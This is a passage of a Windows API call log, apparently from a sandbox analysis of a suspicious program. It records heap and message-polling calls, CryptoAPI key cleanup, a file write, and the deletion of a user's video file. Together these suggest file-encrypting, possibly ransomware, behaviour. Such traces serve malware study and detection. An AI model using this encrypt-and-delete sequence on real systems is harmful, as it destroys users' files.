lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0212.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0212.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0212.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0212.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.253] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.253] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.253] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.253] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.253] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.253] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.253] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.253] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.253] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.254] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.254] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.254] WriteFile (in: hFile=0x504, lpBuffer=0x3867020*, nNumberOfBytesToWrite=0x1d68, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3867020*, lpNumberOfBytesWritten=0x8cf5e4*=0x1d68, lpOverlapped=0x0) returned 1 [0212.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.255] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.255] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.255] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.255] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.256] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.256] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.256] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.256] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.256] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.256] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab560, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.256] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0212.256] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.256] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.256] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.256] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.256] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.256] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.256] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.256] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.257] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.257] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.257] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.257] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.257] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.257] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.257] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.257] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.257] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.257] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.258] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.258] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.258] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.258] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.258] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.258] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.258] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.258] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.258] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.258] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.258] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.258] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.258] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.258] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.259] CryptReleaseContext (hProv=0xa7c770, dwFlags=0x0) returned 1 [0212.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.259] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.259] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.259] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.259] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.259] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.259] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.259] CloseHandle (hObject=0x4f4) returned 1 [0212.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.261] CloseHandle (hObject=0x504) returned 1 [0212.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.263] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.263] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.263] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/A5YVihV.avi", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\A5YVihV.avi", lpFilePart=0x8cedf4*="A5YVihV.avi") returned 0x22 [0212.263] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\A5YVihV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\a5yvihv.avi")) returned 0x20 [0212.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\A5YVihV.avi", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdabc6600, ftCreationTime.dwHighDateTime=0x1d5d569, ftLastAccessTime.dwLowDateTime=0x9a905450, ftLastAccessTime.dwHighDateTime=0x1d5d259, ftLastWriteTime.dwLowDateTime=0x9a905450, ftLastWriteTime.dwHighDateTime=0x1d5d259, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="A5YVihV.avi", cAlternateFileName="")) returned 0x9e1bf8 [0212.263] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\A5YVihV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\a5yvihv.avi")) returned 1 [0212.265] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdabc6600, ftCreationTime.dwHighDateTime=0x1d5d569, ftLastAccessTime.dwLowDateTime=0x9a905450, ftLastAccessTime.dwHighDateTime=0x1d5d259, ftLastWriteTime.dwLowDateTime=0x9a905450, ftLastWriteTime.dwHighDateTime=0x1d5d259, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="A5YVihV.avi", cAlternateFileName="")) returned 0 [0212.265] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0212.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b20 | out: hHeap=0x2af0000) returned 1 [0212.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.266] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.266] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.267] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0212.267] RtlAllocateHeap 